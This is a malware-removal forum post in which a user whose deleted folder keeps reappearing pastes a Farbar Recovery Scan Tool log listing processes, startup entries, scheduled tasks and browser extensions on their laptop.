Folder Keeps Reappearing After Delete - Virus, Trojan, Spyware, And ...

Có thể bạn quan tâm

Sign In
Create Account

Search Advanced

View New Content
Forum Rules
BleepingComputer.com
Forums
Members
Tutorials
Startup List
Virus Removal
Downloads
Uninstall List
Welcome Guide
More

Javascript Disabled DetectedYou currently have javascript disabled. Several functions may not work. Please re-enable javascript to access full functionality.

Register a free account to unlock additional features at BleepingComputer.com Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site. Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Latest News: OpenAI's ChatGPT ads will allegedly prioritize sponsored content in answers

Featured Deal: A lifetime of ad-free documentaries without a recurring bill in this deal

Latest Buyer's Guide: Best VPNs in 2025

Folder keeps reappearing after delete Started by Jones2021Riano , May 06 2021 03:41 AM

Page 1 of 4
1
2
3

This topic is locked

49 replies to this topic

#1 Jones2021Riano

Members
45 posts
OFFLINE

Local time:01:21 AM

Posted 06 May 2021 - 03:41 AM

Good Day!

I have the same problem as this person from a previous forum: C:\ProgramData\TXQMPC keeps coming back... - Virus, Trojan, Spyware, and Malware Removal Help (bleepingcomputer.com)

I have followed the directions on how to use the FRST and here is the copied text:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 28-04-2021 Ran by FRANCIS (administrator) on LAPTOP-LOE6RFKD (LENOVO 80TU) (06-05-2021 15:34:04) Running from C:\Users\FRANCIS\Downloads Loaded Profiles: FRANCIS Platform: Windows 10 Home Single Language Version 20H2 19042.964 (X64) Language: English (United States) Default browser not detected! Boot Mode: Normal ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Adobe Inc. -> Adobe Inc) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (Adobe Inc. -> Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\acrotray.exe (Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe (Conexant Systems, Inc. -> Conexant Systems Inc.) C:\Windows\System32\CxAudMsg64.exe (Conexant Systems, Inc. -> Conexant Systems, Inc) C:\Program Files\CONEXANT\SAII\SmartAudio.exe (Conexant Systems, Inc. -> Conexant Systems, Inc.) C:\Program Files\CONEXANT\cAudioFilterAgent\CAudioFilterAgent64.exe (Conexant Systems, Inc. -> Conexant Systems, Inc.) C:\Windows\System32\SASrv.exe (Conexant Systems, Inc.) [File not signed] C:\Program Files\CONEXANT\SAII\CxUtilSvc.exe (Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.) C:\Program Files\Dolby\Dolby DAX2\DAX2_APP\DolbyDAX2TrayIcon.exe (Fortemedia Inc -> ) C:\Program Files\CONEXANT\ForteConfig\fmapp.exe (Intel® pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\igfxCUIService.exe (Intel® pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\igfxEM.exe (Intel® pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\IntelCpHDCPSvc.exe (Intel® pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\IntelCpHeciSvc.exe (Intel® Rapid Storage Technology -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\iaahcic.inf_amd64_f222132bfa8270de\RstMwService.exe (Lanzhou Itanium Software Technology Co., Ltd. -> Zbshareware Lab) C:\Program Files (x86)\USB Disk Security\USBGuard.exe (Lenovo -> ) C:\Program Files (x86)\Lenovo\System Update\SUService.exe (Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\PluginHost86\Lenovo.Modern.ImController.PluginHost.Device.exe (Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe (McAfee, Inc. -> McAfee LLC.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe (McAfee, Inc. -> McAfee, LLC) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe (McAfee, Inc. -> McAfee, LLC) C:\Windows\System32\mfevtps.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\CSP\4.1.106.0\McCSPServiceHost.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe <3> (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\ModuleCore\ProtectedModuleHost.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\VSCore_20_12\mcapexe.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\MAT\McPvTray.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\MfeAV\MfeAVSvc.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\servicehost.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\uihost.exe (McAfee, LLC. -> McAfee, LLC.) C:\ProgramData\McAfee\McInstruTrack\McInstruTrack.exe (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe <19> (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe (Microsoft Corporation -> Microsoft Corporation) C:\Users\FRANCIS\AppData\Local\Microsoft\OneDrive\OneDrive.exe (Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <3> (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe <2> (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\Taskmgr.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe <2> (Microsoft Windows Publisher -> Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe <2> (Node.js Foundation -> Node.js) C:\Program Files\Adobe\Adobe Creative Cloud Experience\libs\node.exe (NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2> (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <2> (Qualcomm Atheros -> Windows ® Win 7 DDK provider) C:\Windows\System32\AdminService.exe (Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe (Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe ==================== Registry (Whitelisted) =================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [cAudioFilterAgent] => C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent64.exe [602968 2015-12-07] (Conexant Systems, Inc. -> Conexant Systems, Inc.) HKLM\...\Run: [ForteConfig] => C:\Program Files\Conexant\ForteConfig\fmapp.exe [49056 2010-10-26] (Fortemedia Inc -> ) HKLM\...\Run: [DAX2_APP] => C:\Program Files\Dolby\Dolby DAX2\DAX2_APP\DolbyDAX2TrayIcon.exe [849920 2017-03-07] (Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.) HKLM\...\Run: [SmartAudio] => C:\Program Files\CONEXANT\SAII\SACpl.exe [1831768 2016-08-29] (Conexant Systems, Inc. -> Conexant Systems, Inc.) HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3412680 2021-02-17] (Adobe Inc. -> Adobe Systems, Incorporated) HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated) HKLM-x32\...\Run: [USB Security] => C:\Program Files (x86)\USB Disk Security\USBGuard.exe [695528 2015-01-31] (Lanzhou Itanium Software Technology Co., Ltd. -> Zbshareware Lab) HKLM-x32\...\Run: [Adobe CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [114824 2020-07-30] (Adobe Inc. -> ) HKLM-x32\...\Run: [TeamsMachineInstaller] => C:\Program Files (x86)\Teams Installer\Teams.exe [114671912 2021-02-10] (Microsoft Corporation -> Microsoft Corporation) HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrotray.exe [5237416 2021-03-06] (Adobe Inc. -> Adobe Systems Inc.) HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Run: [BitTorrent] => C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe [2135080 2021-03-25] (BitTorrent Inc -> BitTorrent Inc.) HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Run: [Lync] => C:\Program Files\Microsoft Office\root\Office16\lync.exe [26374984 2021-05-02] (Microsoft Corporation -> Microsoft Corporation) HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Run: [AdobeBridge] => [X] HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Run: [com.squirrel.Teams.Teams] => C:\Users\FRANCIS\AppData\Local\Microsoft\Teams\Update.exe [2452664 2020-12-10] (Microsoft 3rd Party Application Component -> Microsoft Corporation) HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\Run: [com.squirrel.Teams.Teams] => C:\Users\PC Gamer Jones\AppData\Local\Microsoft\Teams\Update.exe --processStart "Teams.exe" --process-start-args "--system-initiated" HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\Run: [BitTorrent] => C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe [2135080 2021-03-25] (BitTorrent Inc -> BitTorrent Inc.) HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\Run: [AdobeBridge] => [X] HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\Run: [Exetender] => "C:\Program Files (x86)\Free Ride Games\GPlayer.exe" /runonstartup HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\RunOnce: [DependencyCheck] => Performed HKLM\...\Print\Monitors\Adobe PDF Port Monitor: C:\WINDOWS\system32\AdobePDF.dll [65496 2021-02-02] (Adobe Inc. -> Adobe Systems Inc) Startup: C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GenuineService.lnk [2019-08-09] ShortcutTarget: GenuineService.lnk -> C:\Users\FRANCIS\Autodesk\Genuine Service\GenuineService.exe (Autodesk, Inc. -> Autodesk) Startup: C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2021-04-08] ShortcutTarget: Send to OneNote.lnk -> C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation) HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION ==================== Scheduled Tasks (Whitelisted) ============ (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {030D016F-C42A-4638-8891-3F3AD473EC60} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [141144 2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Task: {06CECE40-6FA4-4D81-9806-5215ACA506EC} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23103392 2021-04-21] (Microsoft Corporation -> Microsoft Corporation) Task: {1799BC3D-AF55-4040-97AA-B6746FAAFB67} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2103.7-0\MpCmdRun.exe [566368 2021-04-11] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {1DB835C3-2613-4254-88FD-E2BCCD03CED9} - System32\Tasks\McInstruTrack => C:\ProgramData\McAfee\McInstruTrack\McInstruTrack.exe [775360 2020-12-15] (McAfee, LLC. -> McAfee, LLC.) Task: {257132D5-DB23-4063-BC46-F6858F9477E3} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1260400 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation) "C:\Windows\System32\Tasks\McAfee\McAfee Idle Detection Task" was unlocked. <==== ATTENTION Task: {261B4330-E64A-44CC-8530-3D8BDD56EF74} - System32\Tasks\McAfee\McAfee Idle Detection Task => {ABCDCA3B-DE6B-5A7C-B132-6D7CBA63E5C5} C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe [995848 2021-03-29] (McAfee, LLC -> McAfee, LLC) Task: {33517268-D16F-47DC-8C91-E259FE340A49} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1260400 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation) Task: {3C12DCA7-5046-47AA-AD6B-04B33D166576} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2103.7-0\MpCmdRun.exe [566368 2021-04-11] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {466EBA7D-08E1-468E-92F3-C295C9758910} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [905584 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation) Task: {48D9B3B6-4450-487D-A4D0-EE744CDCA45B} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [5229504 2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Task: {490721B9-A199-4631-B59B-12050CB6CB5F} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [874472 2020-09-29] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log Task: {6320F9EA-93EA-4A88-990D-32413D851D71} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Monitor => C:\WINDOWS\system32\ImController.InfInstaller.exe [62392 2021-03-14] (Lenovo -> Lenovo Group Ltd.) Task: {637782C4-306B-4960-9A86-CB4EDC830D3E} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee VirusScan\upgrade.exe [4630104 2021-02-03] (McAfee, LLC -> McAfee, LLC) Task: {642F9BCA-62E6-4423-AE6F-17028198A2D9} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1260400 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation) Task: {6670CD9E-0E7D-4947-9D64-60839CE52340} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23103392 2021-04-21] (Microsoft Corporation -> Microsoft Corporation) Task: {6B183E82-1785-4DE7-821C-E43992C810C3} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1260400 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation) Task: {70E7D95C-F343-4480-8444-15E0F8965F4C} - System32\Tasks\Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_WeeklyTask => %windir%\System32\reg.exe add hklm\SOFTWARE\Lenovo\SystemUpdatePlugin\scheduler /v start /t reg_dword /d 1 /f /reg:32 Task: {71643631-02C0-454A-94E7-2E21E49D1E8A} - System32\Tasks\McAfee\DAD.Execute.Updates => C:\Program Files\Common Files\McAfee\DynamicAppDownloader\1.6.102\DADUpdater.exe [4114728 2021-04-26] (McAfee, LLC -> McAfee, LLC) Task: {7AF1B6B9-494A-4503-B5CF-3AB48BC7D2C4} - System32\Tasks\Lenovo\BatteryGauge\BatteryGaugeMaintenance => C:\ProgramData\Lenovo\ImController\Plugins\LenovoBatteryGaugePackage\x64\BGHelper.exe [143888 2021-03-02] (Lenovo -> Lenovo Group Ltd.) Task: {7E2969D5-A5A7-4250-A26F-21D4EB53A6EC} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent => {ABCECA3B-EA5A-496B-A021-5C6BAB365E5C} C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe [995848 2021-03-29] (McAfee, LLC -> McAfee, LLC) Task: {82F7335F-144E-45F8-8E0A-FB23AA76AC60} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1790184 2021-04-30] (Avast Software s.r.o. -> Avast Software) Task: {8A1F08FE-1A68-4EDA-846F-136862319E8B} - System32\Tasks\MATLAB R2019b Startup Accelerator => C:\Program Files\MATLAB\R2019b\bin\win64\MATLABStartupAccelerator.exe [53248 2019-07-19] () [File not signed] Task: {8EF0C3D4-9F36-4C5A-B40F-9ED049FEBD76} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\59b8c9d3-b395-4eb2-8edc-6e897f84c883 => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81824 2021-03-14] (Lenovo -> Lenovo Group Ltd.) Task: {901DC0CF-2F8E-4997-9EDF-E6D41C130D8A} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [905584 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation) Task: {91E13CB6-EBE8-44AB-9331-14D7A32E45A7} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\39a63f2d-0daf-4b9b-a96d-bc584b800309 => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81824 2021-03-14] (Lenovo -> Lenovo Group Ltd.) Task: {93BD2383-BEA9-47CC-9D6C-EEE5A3501F2C} - System32\Tasks\TVT\TVSUUpdateTask_UserLogOn => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [1758224 2021-02-22] (Lenovo -> ) Task: {9E5D1EA3-A99B-4D01-B17C-A4732318731E} - System32\Tasks\Microsoft\NlsLexipir => C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe "C:\Program Files (x86)\Common Files\NotesDriver\ClyentrAgent\SETwm_2x80.dll" Task: {A3A4E228-8FE6-4395-8B08-E98D22A50764} - System32\Tasks\Lenovo\Lenovo Service Bridge\S-1-5-21-3936790745-3440936247-791344644-1001 => C:\Users\FRANCIS\AppData\Local\Programs\Lenovo\Lenovo Service Bridge\LSBUpdater.exe [87848 2021-05-03] (Lenovo (Beijing) Limited -> Lenovo Group Limited) Task: {B142D6B6-D6C6-4804-9BA9-92A856ADF9F3} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1557200 2021-01-25] (Adobe Inc. -> Adobe Inc.) Task: {BB90F46A-CD76-4EEA-A3F9-8BC323B4FD3A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2103.7-0\MpCmdRun.exe [566368 2021-04-11] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {C44E6E04-62B1-4B13-9759-2FF67153F57D} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3336560 2021-04-08] (NVIDIA Corporation -> NVIDIA Corporation) Task: {C9BB156E-B929-493E-9E5D-2743713C9B37} - System32\Tasks\Microsoft\Office\Office Serviceability Manager => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\officesvcmgr.exe [4071016 2021-04-21] (Microsoft Corporation -> Microsoft Corporation) Task: {D238A51C-A36E-4720-AE7B-2697714881C7} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe [740760 2021-03-31] (McAfee, LLC -> McAfee, LLC) Task: {D72A7211-88AD-4D37-AD44-D1A374E9A11A} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [645488 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation) Task: {DA539217-6EA6-4242-8857-3ACB67528549} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [141144 2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Task: {DC68A6EB-3D9A-40BD-81B8-A8C2AC8E31E3} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance => "%windir%\system32\sc.exe" START ImControllerService Task: {E08158BD-7182-439B-89FB-AD55823E9894} - System32\Tasks\TVT\TVSUUpdateTask => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [1758224 2021-02-22] (Lenovo -> ) Task: {E0C41DCC-6827-4AFF-9AAA-28525F7C268E} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [874472 2020-09-29] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvBackend\NvBatteryBoostCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerBatteryBoostCheck.log Task: {E3424804-21BB-417A-984C-D46CE18CA2BA} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\e4e6c1f8-eed0-466c-8078-a92c0fd7e85a => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81824 2021-03-14] (Lenovo -> Lenovo Group Ltd.) Task: {E77F4ED0-6284-4289-AF0B-A7E350FB4A86} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\d0bc3793-ac32-4e9f-9c52-27f20cb62f47 => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81824 2021-03-14] (Lenovo -> Lenovo Group Ltd.) Task: {E888FAEB-9001-4367-BAB5-DFB95CCD3217} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [5229504 2021-05-02] (Microsoft Corporation -> Microsoft Corporation) (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe Task: C:\WINDOWS\Tasks\MATLAB R2019b Startup Accelerator.job => C:\Program Files\MATLAB\R2019b\bin\win64\MATLABStartupAccelerator.exe ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Hosts: Hosts file not detected in the default directory Tcpip\Parameters: [DhcpNameServer] 192.168.15.1 Tcpip\..\Interfaces\{204a6e4f-bb21-4465-afa7-eb9d10065002}: [DhcpNameServer] 192.168.15.1 Tcpip\..\Interfaces\{29e88bd8-7886-4ff5-af4c-24b71a9c5f1d}: [DhcpNameServer] 192.168.15.1 Edge: ======= DownloadDir: C:\Users\FRANCIS\Downloads Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found] Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found] Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found] Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found] Edge DefaultProfile: Default Edge Profile: C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default [2021-05-06] Edge DownloadDir: C:\Users\FRANCIS\Downloads Edge Session Restore: Default -> is enabled. Edge Extension: (Outlook) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bjhmmnoficofgoiacjaajpkfndojknpb [2020-10-20] Edge Extension: (Hotspot Shield Free VPN Proxy - Unlimited VPN) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\cdbkakmeogejmlpgioplhjkaablahbmj [2021-02-18] Edge Extension: (Grammarly for Microsoft Edge) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\cnlefmmeadmemmdciolhbnfeacpdfbkd [2021-05-06] Edge Extension: (Adblock Plus - free ad blocker) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\gmgoamodcdcjnbaobigkjelfplakmdhh [2021-02-19] Edge Extension: (Word) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\hikhggiobiflkdfdgdajcfklmcibbopi [2020-10-20] Edge Extension: (Malwarebytes Browser Guard) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ihcjicgdanjaechkgeegckofjjedodee [2021-05-06] Edge Extension: (Momentum) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jdoanlopeanabgejgmdncljhkdplcfed [2021-05-06] Edge Extension: (Excel) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\leffmjdabcgaflkikcefahmlgpodjkdm [2020-10-20] Edge Extension: (PowerPoint) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\opfacbhaojodjaojgocnibmklknchehf [2020-10-20] Edge Extension: (Mapua Enrollment Bot) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\pboendiadmllnchnkaooickindpppinl [2021-02-18] Edge HKLM-x32\...\Edge\Extension: [ihcjicgdanjaechkgeegckofjjedodee] FireFox: ======== FF DefaultProfile: gwnyf9lv.default FF ProfilePath: C:\Users\FRANCIS\AppData\Roaming\Mozilla\Firefox\Profiles\gwnyf9lv.default [2021-03-30] FF ProfilePath: C:\Users\FRANCIS\AppData\Roaming\Mozilla\Firefox\Profiles\6ew9mwxv.default-release [2021-05-04] FF Extension: (Greasemonkey) - C:\Users\FRANCIS\AppData\Roaming\Mozilla\Firefox\Profiles\6ew9mwxv.default-release\Extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi [2021-03-30] FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi FF Extension: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi [2021-02-01] FF HKLM\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\McAfee\MSKHKLM => not found FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi FF HKLM-x32\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\McAfee\MSK 